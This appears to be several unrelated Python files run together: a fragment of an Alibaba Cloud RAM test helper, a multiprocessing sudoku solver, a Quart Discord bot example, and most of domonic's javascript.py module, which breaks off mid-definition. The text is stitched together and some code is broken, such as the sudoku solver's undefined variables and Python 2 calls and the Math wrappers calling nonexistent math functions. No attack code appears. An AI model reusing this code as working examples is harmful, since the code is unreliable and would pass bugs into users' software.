find_in_response(response, keys=['Roles', 'Role']): role_name = role['RoleName'] role_arn = role['Arn'] if role_name == self.default_ram_role_name: self.ram_role_arn = role_arn return policy_doc = """ { "Statement": [ { "Action": "sts:AssumeRole", "Effect": "Allow", "Principal": { "RAM": [ "acs:ram::%s:root" ] } } ], "Version": "1" } """ % self.root_user_id response = request_helper(self.client, CreateRoleRequest(), RoleName=self.default_ram_role_name, AssumeRolePolicyDocument=policy_doc) self.ram_role_arn = find_in_response(response, keys=['Role', 'Arn']) # FIXME We have wait for 5 seconds after CreateRole before # we can AssumeRole later time.sleep(5) def _delete_default_ram_role(self): request_helper(self.client, DeleteRoleRequest(), RoleName=self.default_ram_role_name) def disabled(func): def _decorator(func): pass return _decorator class MyServer: _headers = {} _url = '' def __enter__(self): class ServerHandler(SimpleHTTPRequestHandler): def do_GET(_self): _self.protocol_version = 'HTTP/1.1' self._headers = _self.headers self._url = _self.path _self.send_response(200) _self.send_header("Content-type", "application/json") _self.end_headers() _self.wfile.write(b"{}") self.server = HTTPServer(("", 51352), ServerHandler) def thread_func(): self.server.serve_forever() thread = threading.Thread(target=thread_func) thread.start() return self def __exit__(self, exc_type, exc_val, exc_tb): if self.server: self.server.shutdown() self.server = None @property def headers(self): return self._headers @property def url(self): return self._url
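request_helper() above drives the Alibaba Cloud request objects purely through their set_<ParameterName> setters and then decodes the JSON body returned by do_action_with_exception(). The following is a small self-contained sketch of that setter-dispatch idea; StubRequest and StubClient are hypothetical stand-ins for the aliyunsdk request classes and AcsClient.

import json


class StubRequest:
    """Hypothetical request object exposing one set_-prefixed setter."""

    def __init__(self):
        self._params = {}

    def set_UserName(self, value):
        self._params["UserName"] = value


class StubClient:
    """Hypothetical client that echoes the collected parameters as JSON bytes."""

    def do_action_with_exception(self, request):
        return json.dumps({"Echo": request._params}).encode("utf-8")


def request_helper(client, request, **params):
    # Mirrors the helper above: dispatch each keyword to its set_<Name> setter.
    for key, value in params.items():
        setter = "set_" + key
        if hasattr(request, setter):
            getattr(request, setter)(value)
        else:
            raise Exception(
                "{0} has no parameter named {1}.".format(request.__class__.__name__, key))
    return json.loads(client.do_action_with_exception(request).decode("utf-8"))


if __name__ == "__main__":
    print(request_helper(StubClient(), StubRequest(), UserName="alice"))

The hasattr() check is what turns a mistyped keyword argument into an immediate, descriptive exception rather than a silently ignored parameter.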
sudoku_triadoku_multicore.py
import math import copy import multiprocessing import argparse import sys input = [[0,0,6, 0,0,0, 0,0,0], [0,0,0, 0,0,0, 0,4,0], [1,0,9, 0,0,0, 0,0,0], [0,8,0, 0,0,0, 0,3,0], [0,0,2, 5,0,1, 4,0,0], [3,4,0, 8,0,7, 0,0,0], [0,0,0, 0,6,0, 0,0,7], [0,3,0, 0,5,0, 0,0,1], [4,0,0, 0,0,1, 0,0,9]] #nput = [[4, 8, 6, 5, 2, 3, 9, 1, 5], [3, 2, 0, 6, 6, 6, 9, 4, 1], [1, 5, 9, 8, 8, 4, 3, 2, 6], [0, 8, 0, 0, 0, 0, 0, 3, 0], [6, 0, 2, 5, 0, 5, 4, 0, 0], [3, 4, 2, 8, 6, 7, 0, 6, 2], [2, 0, 0, 2, 6, 0, 2, 0, 7], [0, 3, 4, 0, 5, 4, 0, 9, 1], [4, 5, 0, 0, 5, 1, 8, 5, 9]] def findNextCellToFill(grid, i, j): for x in range(i,len(grid)): for y in range(j,len(grid[x])): if grid[x][y] == 0: return x,y for x in range(0,len(grid)): for y in range(0,len(grid[x])): if grid[x][y] == 0: return x,y return -1,-1 def isValidSudoku(grid, i, j, e): squareOk = all([e != grid[i][x] for x in range(9)]) if squareOk: r = int(math.floor(j/3)) c = j % 3 rowOk = True columnOk = True ii = int(math.floor(i/3)) if (i == 0) or (i == 1) or (i == 2): rowOk = all([e != grid[ii*3][(r*3)+x] for x in range(3)]) and all([e != grid[ii*3+1][(r*3)+x] for x in range(3)]) and all([e != grid[ii*3+2][ r*3 + x ] for x in range(3)]) if (i == 0) or (i == 7) or (i == 5): columnOk = all([e != grid[0][c+(x*3)] for x in range(3)]) and all([e != grid[7][c+ (x*3)] for x in range(3)]) and all([e != grid[5][c+ (x*3)] for x in range(3)]) if (i == 3) or (i == 1) or (i == 8): columnOk = all([e != grid[3][c+(x*3)] for x in range(3)]) and all([e != grid[1][c+ (x*3)] for x in range(3)]) and all( [e != grid[8][c+ (x*3)] for x in range(3)]) if (i == 6) or (i == 4) or (i == 2): columnOk = all([e != grid[6][c+(x*3)] for x in range(3)]) and all([e != grid[4][c+ (x*3)] for x in range(3)]) and all( [e != grid[2][c+ (x*3)] for x in range(3)]) if rowOk and columnOk: return True return False def findoptions(grid): options = [] nr_options = 0 for i in range (0, len(grid)): sq_options = [] for j in range (0, len(grid[i])): cell_options = [] if (grid[i][j] == 0): for e in range(1,10): if isValidSudoku(grid,i,j,e): cell_options.append(e) else: cell_options.append(grid[i][j]) if (len(cell_options) > 1): nr_options += len(cell_options) sq_options.append(cell_options) options.append(sq_options) print("nr of options", math.pow(10, nr_options)) return options count = 0 options = [] solve_size = 2 def solveSudokuTrial(grid, e, return_dic, options, i=0, j=0): i,j = findNextCellToFill(grid, i, j) if i == -1: return_dic[e] = True return True #for e in range(1,10): for e in options[i][j]: if isValidSudoku(grid,i,j,e): grid[i][j] = e if solveSudokuTrial(grid, e, return_dic, options, i, j): print("Found Solution: ", grid, grid[1][1], grid[8][6], grid[4][5]) return_dic[e] = True return True # Undo the current cell for backtracking grid[i][j] = 0 return_dic[e] = False return False def solveSudoku(grid, i=0, j=0): global count global options if (count == 0): options = findoptions(grid) print(options) processes = [] manager = multiprocessing.Manager() return_dict = manager.dict() #while (prev_length != min_length or min_i != prev_i or min_j != prev_j): for i in range (0, len(options)): for j in range (0, len(options[i])): if (len(options[i][j]) > 1): for e in options[i][j]: test_grid = copy.deepcopy(grid) test_grid[i][j] = e print("testing ", i, j, options[i][j], e) p = multiprocessing.Process(target=solveSudokuTrial, args=(test_grid,e, return_dict, options,0, 0)) #test = solveSudokuTrial(test_grid) processes.append(p) p.start() for process in processes: process.join() print("join") 
print("JOIINED") processes = [] for e in options[i][j]: if (return_dict.has_key(e)): print("return ", e, return_dict[e]) if not return_dict[e]: options[i][j].remove(e) print("removed ", e, options) else: print ("cannot find key ", i, j, e, " in ", return_dict) if (len(options[i][j]) == 1): grid[min_i][min_j] = options[min_i][min_j][0] print("NEW grid ", grid) if len(options[min_i][min_j]) == 0: print ("ERROR CAN NOT SOLVE THIS SUDOKU") return False print("trying last option") return solveSudokuTrial(grid) # min_length = 10 # prev_i = min_i # prev_j = min_j # prev_length = min_length # for i in range (0, len(options)): # for j in range (0, len(options[i])): # # print(i, j, len(options[i][j]), min_length, min_i, min_j) # if (len(options[i][j]) > 1 and len(options[i][j]) < min_length): # min_length = len(options[i][j]) # min_i = i # min_j = j # print("examining ", min_i, min_j, prev_length, min_length) # if min_i == -1: # print("trying last option") # return solveSudokuTrial(grid) # nr_processes = 0 # print("FINISHED", found, min_i, min_j) def main(argv): parser = argparse.ArgumentParser(description='solve sudoke with 3 variables') parser.add_argument('-d', '--vard', default=0, type=int) parser.add_argument('-e', '--vare', default=0, type=int) parser.add_argument('-f', '--varf', default=0, type=int) parser.add_argument('-g', '--varg', default=0, type=int) parser.add_argument('-hh', '--varh', default=0, type=int) parser.add_argument('-i', '--vari', default=0, type=int) args=parser.parse_args() input[0][7] = args.vard input[1][8] = args.vare input[2][6] = args.varf input[1][1] = args.varg input[8][6] = args.varh input[4][5] = args.vari solveSudoku(input) if __name__ == "__main__": main(sys.argv[1:])
async_quart.py
import os
import sys
import time
import asyncio
import threading

from quart import Quart

# This is just here for the sake of examples testing
# to make sure that the imports work
# (you don't actually need it in your code)
sys.path.insert(1, ".")

import quart.flask_patch

from flask_discord_interactions import (DiscordInteractions,  # noqa: E402
                                        Response)

app = Quart(__name__)
discord = DiscordInteractions(app)

app.config["DISCORD_CLIENT_ID"] = os.environ["DISCORD_CLIENT_ID"]
app.config["DISCORD_PUBLIC_KEY"] = os.environ["DISCORD_PUBLIC_KEY"]
app.config["DISCORD_CLIENT_SECRET"] = os.environ["DISCORD_CLIENT_SECRET"]

discord.update_slash_commands()


# You can now use async functions!
@discord.command()
async def ping(ctx):
    "Respond with a friendly 'pong'!"
    return "Pong!"


# Non-async functions still work
@discord.command()
def pong(ctx):
    return "Ping!"


# You can use followups with asyncio
@discord.command()
async def wait(ctx, seconds: int):
    async def do_followup():
        await asyncio.sleep(seconds)
        await ctx.edit("Done!")
        await ctx.close()

    asyncio.create_task(do_followup())
    return Response(deferred=True)


# Normal followups work as well
@discord.command()
def wait_sync(ctx, seconds: int):
    def do_followup():
        time.sleep(seconds)
        ctx.edit("Done!")

    threading.Thread(target=do_followup).start()
    return Response(deferred=True)


# Use set_route_async if you want to use Quart
discord.set_route_async("/interactions")

discord.update_slash_commands(guild_id=os.environ["TESTING_GUILD"])


if __name__ == '__main__':
    app.run()
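The wait command above illustrates the deferred-response pattern: reply immediately with Response(deferred=True), then let a background asyncio task deliver the real answer once the slow work finishes. Below is the same idea without Discord or Quart, as a runnable sketch in which a hypothetical edit() callback stands in for ctx.edit().

import asyncio


async def handle_wait(seconds: int, edit):
    async def do_followup():
        await asyncio.sleep(seconds)
        await edit("Done!")

    asyncio.create_task(do_followup())   # schedule the slow part...
    return {"deferred": True}            # ...and answer right away


async def main():
    async def edit(message):
        print("followup:", message)

    print("initial:", await handle_wait(1, edit))
    await asyncio.sleep(1.5)             # keep the loop alive so the task finishes


if __name__ == "__main__":
    asyncio.run(main())

Because asyncio.create_task() only schedules do_followup() and returns immediately, the handler can send its deferred reply without waiting for the slow work.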
javascript.py
""" domonic.javascript ==================================== - https://www.w3schools.com/jsref/jsref_reference.asp - https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference """ import array import datetime import gc import json import math import multiprocessing import os import random import re import signal import struct import sys import threading import time import urllib.parse from multiprocessing.pool import ThreadPool as Pool from typing import Any, Callable, Dict, List, Optional, Tuple, Union from urllib.parse import quote, unquote import requests from dateutil.parser import parse from domonic.webapi.url import URL, URLSearchParams from domonic.webapi.webstorage import Storage def function(python_str: str) -> str: """[evals a string i.e. sup = function('''print(hi)''') sup() ] Args: python_str ([str]): [some valid python code as a string] """ def anon(): return eval(python_str) return anon # TODO - list all javascript keywords to python keywords true: bool = True false: bool = False null: object = None undefined: object = None # globalThis # TODO - do i need to use inpect? or is globals() ok? # def typeof(v): # return type(v).__name__ class Boolean(): """[Creates a Boolean Object. Warning this is NOT a boolean type. for that use Global.Boolean()] """ def __init__(self, value=False) -> None: self.value: bool = Global.Boolean(value) class Object: def __init__(self, obj=None, *args, **kwargs) -> None: """[Creates a Javascript-like Object in python] Args: obj ([type]): [pass an object, dict or callable to the contructor] """ # print('object created!') if obj is None: obj = {} self.prototype = self.__class__ self.__extensible = True self.__frozen = False self.__sealed = False for arg in args: self.__dict__.update(arg) self.__dict__.update(kwargs) # self.__dict__ = {} if callable(obj): self.__dict__.update(obj()) if isinstance(obj, dict): self.__dict__.update(obj) else: try: self.__dict__ = {} self.__dict__.update(obj.__dict__) self.__dict__.update(kwargs) self.__dict__.update(args) # self.__dict__['__class__'] = obj.__class__.__name__ # self.__dict__['__module__'] = obj.__module__ # self.__dict__['__doc__'] = obj.__doc__ # self.__dict__['__proto__'] = obj # self.__dict__['__proto__'].__class__ = Object # self.__dict__['__proto__'].__dict__ = self.__dict__ except Exception as e: print("Object.__init__() failed to set attribs", e) def __str__(self): """ Returns a string representation of the object """ d = self.__dict__.copy() for k, v in list(d.items()): if '__' in k: del d[k] if 'prototype' in k: del d[k] return str(d) # def __repr__(self): # """ Returns a string representation of the object.""" # return self.toString() @staticmethod def fromEntries(entries): """ transforms a list of lists containing key and value into an object. @param entries: a list containing key and value tuples. The key and value are separated by ':' @type entries: list of tuple(string, string) @returns: a dict object. >>> fromEntries(entries) {'a': 1, 'b': 2, 'c': 3} """ return {k: v for k, v in entries} @staticmethod def assign(target, source): """ Copies the values of all enumerable own properties from one or more source objects to a target object. 
""" if isinstance(target, dict): if isinstance(source, dict): for k, v in source.items(): target[k] = v else: for k, v in source.__dict__.items(): target[k] = v else: if isinstance(source, dict): for k, v in source.items(): setattr(target, k, v) else: for k, v in source.attribs.items(): setattr(target, k, v) # return target # for prop in source.__dict__: # if source.propertyIsEnumerable(prop): # target.__dict__[prop] = source.__dict__[prop] return target @staticmethod def create(proto, propertiesObject=None): """ Creates a new object with the specified prototype object and properties. """ if propertiesObject is None: return Object(proto) if isinstance(propertiesObject, dict): return Object(propertiesObject) elif isinstance(propertiesObject, Object): return propertiesObject elif isinstance(propertiesObject, list): return Object.fromEntries(propertiesObject) else: return propertiesObject # return Object(propertiesObject) # obj = {} # for key in proto.keys(): # obj[key] = propertiesObject[key] # return obj @staticmethod def defineProperty(obj, prop, descriptor): """ Adds the named property described by a given descriptor to an object. """ obj[prop] = descriptor # @staticmethod # def defineProperties(obj, props): # """ Adds the named properties described by the given descriptors to an object. """ # for prop, desc in props.items(): # obj.__define_property__(prop, desc) # TODO - obviously that wont work @staticmethod def entries(obj): """ Returns an array containing all of the [key, value] pairs in the object. """ if isinstance(obj, dict): return [[k, v] for k, v in obj.items()] if isinstance(obj, (float, int)): return [] @staticmethod def keys(obj): """ Returns an array containing the names of all of the given object's own enumerable string properties.""" if isinstance(obj, dict): return obj.keys() if isinstance(obj, (float, int)): return [] return obj.__dict__.keys() # TODO - this is probably wrong @staticmethod def values(obj): """ Returns an array containing the values that correspond to all of a given object's own enumerable string properties. """ if isinstance(obj, dict): return obj.values() if isinstance(obj, (float, int)): return [] return obj.__dict__.values() # TODO - this is probably wrong @staticmethod def getOwnPropertyDescriptor(obj, prop): """ Returns a property descriptor for a named property on an object. """ if isinstance(obj, dict): return obj[prop] return obj.__dict__[prop] @staticmethod def getOwnPropertyNames(obj): """ Returns an array containing the names of all of the given object's own enumerable and non-enumerable properties. """ if isinstance(obj, dict): return obj.keys() elif isinstance(obj, Object): return obj.__dict__.keys() elif isinstance(obj, object): return [prop for prop in dir(obj) if not prop.startswith('__')] return obj.__dict__.keys() # @staticmethod # def _is(value1, value2): # """ Compares if two values are the same value. # Equates all NaN values (which differs from both Abstract Equality Comparison # and Strict Equality Comparison).""" # pass @staticmethod def getOwnPropertySymbols(obj): """ Returns an array of all symbol properties found directly upon a given object. """ if isinstance(obj, dict): return [] return [prop for prop in dir(obj) if not prop.startswith('__')] @staticmethod def getPrototypeOf(obj): """ Returns the prototype (internal [[Prototype]] property) of the specified object. 
""" if isinstance(obj, dict): return obj elif isinstance(obj, Object): return obj.prototype elif isinstance(obj, object): return obj.__class__ return obj.__proto__ # @property #TODO - static or prop? # def isExtensible(obj): # """ Determines if extending of an object is allowed """ # return obj.__extensible # @property #TODO - static or prop? # def isSealed(obj): # """ Determines if an object is sealed """ # return obj.__sealed # @property # def preventExtensions(obj): # """ Prevents any extensions of an object. """ # if isinstance(obj, dict): # return False # elif isinstance(obj, Object): # obj.extensible = False # return True # elif isinstance(obj, object): # return False # return False # @property # def seal(obj): # """ Prevents other code from deleting properties of an object. """ # if isinstance(obj, dict): # return False # elif isinstance(obj, Object): # obj.sealed = True # return True # elif isinstance(obj, object): # return False # return False # @property # def setPrototypeOf(obj, prototype): # """ Sets the object's prototype (its internal [[Prototype]] property). """ # if isinstance(obj, dict): # return False # elif isinstance(obj, Object): # obj.prototype = prototype # return True # elif isinstance(obj, object): # return False # return False @property # TODO - static or prop? def isFrozen(self, obj): """ Determines if an object was frozen. """ return self.__isFrozen @staticmethod # TODO - static or prop? def freeze(obj): """ Freezes an object. Other code cannot delete or change its properties. """ obj.__isFrozen = True # def prototype(self, obj): # """ # prototype and allows you to add properties and methods to this object # """ # if isinstance(obj, dict): # return False # elif isinstance(obj, Object): # obj.prototype = self # return True # elif isinstance(obj, object): # return False # return False def __defineGetter__(self, prop, func): """ Adds a getter function for the specified property. """ self.__dict__[prop] = property(func) return self def __defineSetter__(self, prop, func): """ Associates a function with a property that, when set, calls the function. """ self.__dict__[prop] = property(func) return self def __lookupGetter__(self, prop): """ Returns the getter function for the specified property. """ return self.__dict__[prop] def __lookupSetter__(self, prop): """ Returns the function associated with the specified property by the __defineSetter__() method. """ return self.__dict__[prop] def hasOwnProperty(self, prop): """ Returns a boolean indicating whether an object contains the specified property as a direct property of that object and not inherited through the prototype chain. """ # raise NotImplementedError # return hasattr(self, prop) return self.__dict__.get(prop, None) != None def isPrototypeOf(self, obj): """ Returns a boolean indicating whether an object is a copy of this object. """ if isinstance(obj, Object): return obj.prototype == self elif isinstance(obj, dict): return obj == self elif isinstance(obj, object): return obj.__class__ == self.__class__ and obj.__dict__ == self.__dict__ return obj.__class__ == self.__class__ and obj.__proto__ == self # def propertyIsEnumerable(self, prop): # """ Returns a boolean indicating whether the specified property is enumerable. """ # pass def toLocaleString(self): """ Calls toString()""" return self.toString() def toString(self): """ Returns a string representation of the object.""" return '[' + self.__class__.__name__ + ': ' + str(self.__dict__) + ']' def valueOf(self): """ Returns the value of the object. 
""" return self def __iter__(self): """ Iterates over object's properties. """ for prop in self.__dict__: yield prop for key in self.__dict__: yield key # return # return self.__dict__.__iter__() def __hash__(self): """ Returns the hash of the object. """ return hash(self.toString()) def __eq__(self, other): """ Compares two objects. """ if isinstance(other, Object): return self.toString() == other.toString() return False def __ne__(self, other): """ Compares two objects. """ if isinstance(other, Object): return self.toString() != other.toString() return True def __nonzero__(self): """ Returns whether the object is false. """ return self.toString() != '' def __bool__(self): """ Returns whether the object is false. """ return self.toString() != '' # def __dict__(self): # """ Returns the object's attributes as a dictionary. """ # return self.__dict__ def __getitem__(self, key): """ Returns the value of the specified property. """ # return self.__dict__[key] # return self.__dict__.get(key, None) return self.__dict__.get(key) def __deepcopy__(self, memo): """ Makes a deep copy of the object. """ return self.__class__(self.__dict__) def __setitem__(self, key, value): """ Sets the value of the specified property. """ # self.__dict__[key] = value return self.__dict__.__setitem__(key, value) def __delitem__(self, key): """ Deletes the specified property. """ del self.__dict__[key] def __len__(self): """ Returns the number of properties. """ return len(self.__dict__) def __contains__(self, key): """[Returns whether the specified property exists.] Args: key ([str]): [The name of the property to check for.] Returns: [bool]: [True if the specified property exists. Otherwise, False.] """ return key in self.__dict__ def __getattr__(self, name): """[gets the value of the specified property] Args: name ([str]): [the name of the property] Returns: [str]: [the value of the specified property] """ return self.__getitem__(name) def __setattr__(self, name, val): """[sets the value of the specified property] Args: name ([str]): [the name of the property] val ([str]): [the value of the property] Returns: [str]: [the value of the property] """ return self.__setitem__(name, val) def __delattr__(self, name): """[deletes the specified property] Args: name ([str]): [the name of the property] Returns: [type]: [the value of the property] """ return self.__delitem__(name) # def __call__(self, *args, **kwargs): # """ Calls the object. """ # return self.toString() class Function(Object): """ a Function object """ def __init__(self, func, *args, **kwargs): self.func = func self.arguments = args self.caller = None self.displayName = None self.length = None self.name = None # self.isCallable = True # self.constructor = False # self.__proto__ = None def apply(self, thisArg=None, args=None, **kwargs): """[calls a function with a given this value, and arguments provided as an array] Args: thisArg ([type]): [The value of this provided for the call to func.] Returns: [type]: [result of calling the function.] """ if thisArg is not None: try: return self.func(args) # kwargs? except TypeError: return self.func() try: return self.func(*args) except TypeError: return self.func() def bind(self, thisArg, *args, **kwargs): """[creates a new function that, when called, has its this keyword set to the provided value, with a given sequence of arguments preceding any provided when the new function is called.] Args: thisArg ([type]): [The value to be passed as the this parameter to the target function func when the bound function is called.] 
Returns: [type]: [A copy of the given function with the specified this value, and initial arguments (if provided).] """ from functools import partial bound_f = partial(self.func, *args, *kwargs) return bound_f # raise NotImplementedError # @staticmethod def call(self, thisArg=None, *args, **kwargs): """[calls a function with a given this value and arguments provided individually.] Args: thisArg ([type]): [description] Returns: [type]: [result of calling the function.] """ if thisArg is not None: try: return self.func(thisArg) # kwargs? except TypeError as e: print(e) return self.func() try: return self.func(*args) except TypeError: return self.func() def toString(self): """[Returns a string representing the source code of the function. Overrides the] """ raise NotImplementedError class Map: """ Map holds key-value pairs and remembers the original insertion order of the keys. """ def __init__(self, collection): """[Pass a list or collection to make a Map object] Args: collection ([type]): [a list or dict] """ # parses the passed collectionn if isinstance(collection, list): # create a dict from the list self.collection = dict(zip(collection, collection)) if isinstance(collection, dict): # use the passed dict self.collection = collection else: raise TypeError("Map requires a list or dict.") self._data: dict = {} self._order: list = [] def __contains__(self, key: str): return key in self._dict def __getitem__(self, key: str): return self._dict[key] def __setitem__(self, key: str, value): if key not in self._dict: self._order.append(key) self._dict[key] = value def __delitem__(self, key: str): self._order.remove(key) del self._dict[key] def clear(self): """ Removes all key-value pairs from the Map object. """ self._data = {} self._order = [] def delete(self, key: str) -> bool: """ Returns true if an element in the Map object existed and has been removed, or false if the element does not exist. Map.prototype.has(key) will return false afterwards. """ try: self._order.remove(key) del self._dict[key] return True except Exception: return False def get(self, key: str, default=None): """ Returns the value associated to the key, or undefined if there is none. """ return self._dict.get(key, default) def has(self, key: str) -> bool: """ Returns a boolean asserting whether a value has been associated to the key in the Map object or not.""" return key in self._dict def set(self, key: str, value): """ Sets the value for the key in the Map object. Returns the Map object. """ if key not in self._dict: self._order.append(key) self._dict[key] = value return self def iterkeys(self): return iter(self._order) def iteritems(self): for key in self._order: yield key, self._dict[key] def keys(self): """ Returns a new Iterator object that contains the keys for each element in the Map object in insertion order. """ return list(self.iterkeys()) def values(self): """ Returns a new Iterator object that contains the values for each element in the Map object in insertion order. """ return list(self.iteritems()) def entries(self): """ Returns a new Iterator object that contains an array of [key, value] for each element in the Map object in insertion order. """ return [(x, self._dict[x]) for x in self._order] # def forEach(self, callbackFn[, thisArg]): # raise NotImplementedError # TODO - is this supposed to pass count like Node list? i.e. 
# for i in range(len(self.args)): # func(self.args[i], i, self.args) def update(self, ordered_dict): for key, value in ordered_dict.iteritems(): self[key] = value def __str__(self): return str([(x, self._dict[x]) for x in self._order]) # TODO - moved to webapi.xhr . might import here for convenience? # class FormData: # """[utils for a form] # Args: # object ([str]): [takes a string or pyml object and returns a FormData] # """ # def __init__(self, form): # """ creates a new FormData object. """ # # TODO - parse to domonic. # # if isinstance(form, str): # # self._data = domonic.loads(form) # TODO - parser wont be done enough yet # # if isinstance(form, Node): # # self._data = form # raise NotImplementedError # def append(self, name, value, filename): # """ Appends a new value onto an existing key inside a FormData object, # or adds the key if it does not already exist. """ # raise NotImplementedError # def delete(self, name): # """ Deletes a key/value pair from a FormData object. """ # raise NotImplementedError # def entries(self): # """ Returns an iterator allowing to go through all key/value pairs contained in this object. """ # raise NotImplementedError # def get(self, name): # """ Returns the first value associated with a given key from within a FormData object. """ # raise NotImplementedError # def getAll(self, name): # """ Returns an array of all the values associated with a given key from within a FormData """ # raise NotImplementedError # def has(self, name): # """ Returns a boolean stating whether a FormData object contains a certain key.""" # raise NotImplementedError # def keys(self): # """ Returns an iterator allowing to go through all keys of the key/value pairs contained in this object.""" # raise NotImplementedError # def set(self, name, value, filename): # """ Sets a new value for an existing key inside a FormData object, # or adds the key/value if it does not already exist.""" # raise NotImplementedError # def values(self): # """ Returns an iterator allowing to go through all values contained in this object.""" # raise NotImplementedError class Worker: """[A background task that can be created via script, which can send messages back to its creator. Creating a worker is done by calling the Worker("path/to/worker/script") constructor.] TODO - JSWorker - Node Args: object ([str]): [takes a path to a python script] """ def __init__(self, script): """ creates a new Worker object. """ raise NotImplementedError def postMessage(self): """ Sends a message — consisting of any object — to the worker's inner scope. """ raise NotImplementedError def terminate(self): """ Immediately terminates the worker. This does not let worker finish its operations; it is halted at once. ServiceWorker instances do not support this method. """ raise NotImplementedError class Math(Object): """ Math class that mirrors javascript implementation. i.e. 
you can pass strings and it will also work, Math.abs('-1') """ PI: float = 3.141592653589793 E: float = 2.718281828459045 LN2: float = 0.6931471805599453 LN10: float = 2.302585092994046 LOG2E: float = 1.4426950408889634 LOG10E: float = 0.4342944819032518 SQRT1_2: float = 0.7071067811865476 SQRT2: float = 1.4142135623730951 def _force_number(func): """[private decorator to make Math behave like javascript and turn strings, bools and None into numbers]] """ def validation_decorator(*args, **kwargs): params = list(args) for i, n in enumerate(params): if type(n) == list or type(n) == tuple: if len(n) == 0: params[i] = n = 0 elif len(n) == 1: params[i] = n = n[0] if type(n) == str: if n == "": params[i] = n = 0 continue if n is None: params[i] = 0 continue if type(n) != float and type(n) != int: try: if '.' in n: params[i] = float(n) else: params[i] = int(n) except Exception: # raise ValueError("") # js returns None instead pass args = tuple(params) try: return func(*args) except Exception: return None return validation_decorator @staticmethod @_force_number def abs(x: float) -> float: """[Returns the absolute value of a number.] Args: x ([float]): [number] Returns: [float]: [absolute value] """ return abs(x) @staticmethod @_force_number def acos(x: float) -> float: """[Returns the arccosine (in radians) of a number.] Args: x ([float]): [number] Returns: [float]: [arccosine] """ return math.acos(x) @staticmethod @_force_number def acosh(x: float) -> float: """ Returns the hyperbolic arccosine of a number. """ return math.acosh(x) @staticmethod @_force_number def asin(x: float) -> float: """ Returns the arcsine (in radians) of a number. """ return math.asin(x) @staticmethod @_force_number def asinh(x: float) -> float: """ Returns the hyperbolic arcsine of a number. """ return math.asinh(x) @staticmethod @_force_number def atan(x: float) -> float: """ Returns the arctangent (in radians) of a number. """ return math.atan(x) @staticmethod @_force_number def atan2(x: float, y: float) -> float: """ Returns the arctangent of the quotient of its arguments. """ return math.atan2(x, y) @staticmethod @_force_number def atanh(x: float) -> float: """ Returns the hyperbolic arctangent of a number. """ return math.atanh(x) @staticmethod @_force_number def cbrt(x: float) -> float: """ Returns the cube root of a number. """ return math.cbrt(x) @staticmethod @_force_number def ceil(x: float) -> float: """ Returns the smallest integer greater than or equal to a number. """ return math.ceil(x) @staticmethod @_force_number def cos(x: float) -> float: """ Returns the cosine of a number. (x is in radians) """ return math.cos(x) @staticmethod @_force_number def cosh(x: float) -> float: """ Returns the hyperbolic cosine of a number. """ return math.cosh(x) @staticmethod @_force_number def exp(x: float) -> float: """ Returns the value of E^x. """ return math.exp(x) @staticmethod @_force_number def floor(x: float) -> float: """ Returns the largest integer less than or equal to a number. """ return math.floor(x) @staticmethod @_force_number def log(x: float, base: float = None) -> float: """ Returns the natural logarithm (base E) of a number. """ if base is None: return math.log(x) else: return math.log(x, base) @staticmethod @_force_number def max(x: float, y: float) -> float: """ Returns the largest of two numbers. """ return max(x, y) @staticmethod @_force_number def min(x: float, y: float) -> float: """ Returns the smallest of two numbers. 
""" return min(x, y) @staticmethod @_force_number def random() -> float: """ Returns a random number between 0 and 1. """ return random.random() @staticmethod @_force_number def round(x: float) -> float: """ Returns the value of a number rounded to its nearest integer. """ return round(x) @staticmethod @_force_number def pow(x: float, y: float) -> float: """ Returns the value of a number raised to a power. """ return math.pow(x, y) @staticmethod @_force_number def sin(x: float) -> float: """ Returns the sine of a number. (x is in radians) """ return math.sin(x) @staticmethod @_force_number def sinh(x: float) -> float: """ Returns the hyperbolic sine of a number. """ return math.sinh(x) @staticmethod @_force_number def sqrt(x: float) -> float: """ Returns the square root of a number. """ return math.sqrt(x) @staticmethod @_force_number def tan(x: float) -> float: """ Returns the tangent of a number. (x is in radians) """ return math.tan(x) @staticmethod @_force_number def tanh(x: float) -> float: """ Returns the hyperbolic tangent of a number. """ return math.tanh(x) @staticmethod @_force_number def trunc(x: float) -> float: """ Returns the integer part of a number. """ return math.trunc(x) # TODO - test @staticmethod # @_force_number def hypot(*args): """ returns the square root of the sum of squares of its arguments """ return math.hypot(*args) # TODO - test @staticmethod # @_force_number def log2(*args): """ returns the square root of the sum of squares of its arguments """ return math.log2(*args) # TODO - test @staticmethod # @_force_number def loglp(*args): """ returns the natural logarithm (base e) of 1 + a number, that is """ return math.loglp(*args) # TODO - test @staticmethod @_force_number def log10(x): """ function returns the base 10 logarithm of a number, that is """ return math.log10(x) # TODO - test @staticmethod @_force_number def fround(x): """ returns the nearest 32-bit single precision float representation of a Number """ # return math.log10(x) raise NotImplementedError # TODO - test @staticmethod @_force_number def clz32(x): """ returns the number of leading zero bits in the 32-bit binary representation of a number. """ raise NotImplementedError # import urllib class Global: """ javascript global methods """ NaN = "NaN" Infinity = float("inf") __timers = {} # TODO - https://stackoverflow.com/questions/747641/what-is-the-difference-between-decodeuricomponent-and-decodeuri @staticmethod def decodeURI(x): """ Decodes a URI """ return unquote(x) @staticmethod def decodeURIComponent(x): """ Decodes a URI component """ return unquote(x, encoding="utf-8") @staticmethod def encodeURI(x): """ Encodes a URI """ return quote(str(x), safe='~@#$&()*!+=:;,.?/\'') @staticmethod def encodeURIComponent(x): """ Encodes a URI component """ return quote(str(x), safe='~()*!.\'') # @staticmethod # def escape(): """ Deprecated in version 1.5. 
Use encodeURI() or encodeURIComponent() """ # pass @staticmethod def eval(pythonstring): """ Evaluates a string and executes it as if it was script code """ eval(pythonstring) @staticmethod def isFinite(x) -> bool: # TODO - test """ Returns true if x is a finite number """ return math.isfinite(x) @staticmethod def isNaN(x): """ Determines whether a value is an illegal number """ try: return math.isnan(x) except TypeError: return True def NaN(self): """ "Not-a-Number" value """ # return self.NaN return "NaN" @staticmethod def Number(x): """ Converts an object's value to a number """ try: if type(x) == float or type(x) == int: # or type(x) == long: return x if type(x) == str: if '.' in x: return float(x) else: return int(x) except Exception: return "NaN" return "NaN" @staticmethod def Boolean(x): # TODO - test if isinstance(x, int): return bool(x) elif isinstance(x, str): if x.lower() == 'true': return True elif x.lower() == 'false': return False elif x == '': return False else: return True elif isinstance(x, bool): return x elif isinstance(x, (list, tuple, dict, object)): return True elif x is None: return False else: return True @staticmethod def parseFloat(x: str): """ Parses a string and returns a floating point number """ # return float(x) import ast return float(ast.literal_eval(x)) @staticmethod def parseInt(x: str): """ Parses a string and returns an integer """ # return int(x) import ast return int(ast.literal_eval(x)) @staticmethod def 